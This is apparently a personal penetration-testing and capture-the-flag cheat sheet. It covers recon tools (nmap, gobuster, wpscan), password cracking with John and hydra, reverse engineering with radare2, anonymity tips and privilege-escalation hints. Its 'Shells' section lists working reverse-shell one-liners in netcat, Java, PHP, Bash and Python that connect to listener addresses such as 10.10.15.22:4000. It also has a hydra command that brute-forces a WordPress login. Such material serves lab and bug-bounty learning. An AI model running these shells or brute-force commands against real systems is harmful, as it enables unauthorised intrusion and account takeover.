CheatSheet
- Planned ToDo's
- Useful Guides and Links
- Local Webserver
  - Python
  - PHP
  - Ruby
- Useful Tools
  - nmap
  - gobuster
  - wpscan
  - CeWL
  - enum4linux
  - goofile
  - searchsploit
  - John The Ripper – JTR
  - hydra
  - Exiftool
  - radare2
- Shells
  - Set Listener
  - Reverse Shell
    - netcat
    - Java
    - PHP
    - Bash
    - Python
  - Interactive Shell
    - Bash
    - Zsh
- Usefuls Scripts
  - HEX Converter
    - Ascii to Hex
    - Hex to Ascii
- Hide yourself
  - VPN
  - Proxy Chains
  - Tor
- Shellcode Dis/Assembler
- File Uploads
  - Magic Numbers

CheatSheet

Planned ToDo's

[ ] write scripts for automating the repetitive tasks like:
1. look for domain of the company
2. look for subdomains of the domain
3. look for dns entries
4. use Google Hacking for deeper recon
5. generate a detailed report of all findings
6. ...
[x] create a docker-based environment for pentesting/bug bounty hunting (find a way for running GUI based tools in docker)
- Kali-Docker

Useful Guides and Links

For Pentesting/BugBounty-Hunting there is a very detailed map and guide of how to proceed.

Very useful BugBounty CheatSheet from EdOverflow

Bug Bounty Writeups for learning

Local Webserver

Python

python -m SimpleHTTPServer

python3 -m http.server

PHP

php -S 0.0.0.0:8000

Ruby

ruby -run -e httpd . -p 8000

Useful Tools

nmap

scans networks

nmap -sC -sV -oA nmap/openadmin 10.10.10.171

-sC = scans with the standard scripts
-sV = scans the versions

gobuster

bruteforce websites to find directories and/or files

gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist

wpscan

scans a target for wordpress related stuff

## basic scan
wpscan --url 10.10.10.10

## advanced scan with plugin detection
wpscan —url 10.10.10.10 —enumerate p,u —plugins-detection aggressive

CeWL

creates wordlist from website

cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10

enum4linux

enumerates Windows and Samba systems

Ports to look for: 445, 139

enum4linux -U -o 10.10.10.10

goofile

finding specific filetypes in domain

goofile -d kali.org -f pdf

searchsploit

searchsploit tomcat

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.

Command	Description
john –wordlist=/usr/share/wordlists/rockyou.txt hash	JTR password cracking
john –format=descrypt –wordlist/usr/share/wordlists/rockyou.txt hash.txt	JTR forced descrypt cracking with wordlist
john –format=descrypt hash –show	JTR forced descrypt brute force cracking

hydra

hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30

exiftool

Tool to read and modify the metadata of files.

read metadata

exiftool <file>

write metadata

exiftool -artist=me <file>

radare2

radare2 is a tool for reverse-engineering

# start radare2
radare2 file

# analyze all
aa 

# list all functions 
afl

# set selection to main function
s main 

# disassemble
pdf 

# show graph
VV

wfuzz

wfuzz is a web fuzzing tool

example of finding vhosts

wfuzz -H "Host: FUZZ.<domain>" -c -z file,"<path/to/wordlist>" <domain>

Reverse Engineering

Get strings from binary

strings binaryFile

Get hexdump from binary

hexdump --canonical binaryFile

Get assembly

objdump -D -M x86-64 binaryFile

Use radare2 to reverse engineer binary

x86 registers

  ================ rax (64 bits)
          ======== eax (32 bits)
              ====  ax (16 bits)
              ==    ah (8 bits)
                ==  al (8 bits)

register purposes

Register	Purpose	Saved across calls
RAX	temp register; return value	no
RBX	callee-saved	yes
RCX	used to pass 4th argument to functions	no
RDX	used to pass 3rd argument to functions	no
RSP	stack pointer	yes
RBP	callee-saved; base pointer	yes
RSI	used to pass 2nd argument to functions	no
RDI	used to pass 1st argument to functions	no
R8	used to pass 5th argument to functions	no
R9	used to pass 6th argument to functions	no
R10-11	temporary	no
R12-15	callee-saved registers	yes

RISC (ARM) instruction set

MOV DESTINATION, SOURCE

Stack

Stackpointer

points to the next item on the stack
grows downwards

Base pointer

unchanged point in memory where the stack starts

memory:                  CPU:

0x0000                  ________ 
|    | <--------------  |  SP  |
|    |        |-------  |  BP  |
|    |        |         |  IP  |
|    | <------|         |  ..  |
|    |                  |  ..  |
|    |                  |  ..  |
0xFFFF                  |______|

Shells

Set Listener

nc -lnvp 4000

Reverse Shell

netcat

nc -e /bin/sh 10.10.15.22 4000

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

PHP

php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Bash

bash -i >& /dev/tcp/10.10.15.22/4000 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Interactive Shell

can be executed with python or python3

Bash

python(3) -c 'import pty; pty.spawn("/bin/bash")'

Ctrl-Z

stty raw -echo

fg

Zsh

python(3) -c 'import pty; pty.spawn("/bin/bash")'

Ctrl-Z

stty raw -echo; fg

Usefuls Scripts

HEX Converter

Ascii to Hex

#!/bin/bash
echo $1 | tr -d "\n" | hexdump -v -e '16/1 "%02x " "\n"'

Hex to Ascii

#!/bin/bash
echo $1 | xxd -r -p

Hide yourself

Interesting Stack Exchange link

VPN

Proxy Chains

A Proxy is an instance between both communication partners. If you send a request to a server the proxy intercepts it and is forwarding this request to the server but is behaving like itself send the request so the server don't know about me. And the exact way back.

A Proxy Chain are multile Proxy Servers chained together so it is way more difficult to get to know the initial sender(client)

Tor

Here is a nice graphic on who sees what in Tor and HTTPS cases.

Shellcode Dis/Assembler

File Uploads

Use

Magic Numbers

these magic numbers at the start of a file define the type of file

BMP : 42 4D
JPG : FF D8 FF E0
PNG : 89 50 4E 47
GIF : 47 49 46 38

Priviledge Escalation

find programms which can be executed as sudo without password

sudo -l

find files that belong to root but can be read by (anyone) because of groups

CheatSheet CheatSheet copied to clipboard

Metadata

CheatSheet

Planned ToDo's

Useful Guides and Links

Local Webserver

Python

PHP

Ruby

Useful Tools

read metadata

write metadata

example of finding vhosts

Reverse Engineering

Get strings from binary

Get hexdump from binary

Get assembly

Use radare2 to reverse engineer binary

x86 registers

register purposes

RISC (ARM) instruction set

Stack

Stackpointer

Base pointer

Shells

Set Listener

netcat

Java

PHP

Bash

Python

Interactive Shell

Bash

Zsh

Usefuls Scripts

HEX Converter

Ascii to Hex

Hex to Ascii

Hide yourself

VPN

File Uploads

Magic Numbers

Priviledge Escalation

← Metadata

Owner

Metadata

CheatSheet
CheatSheet copied to clipboard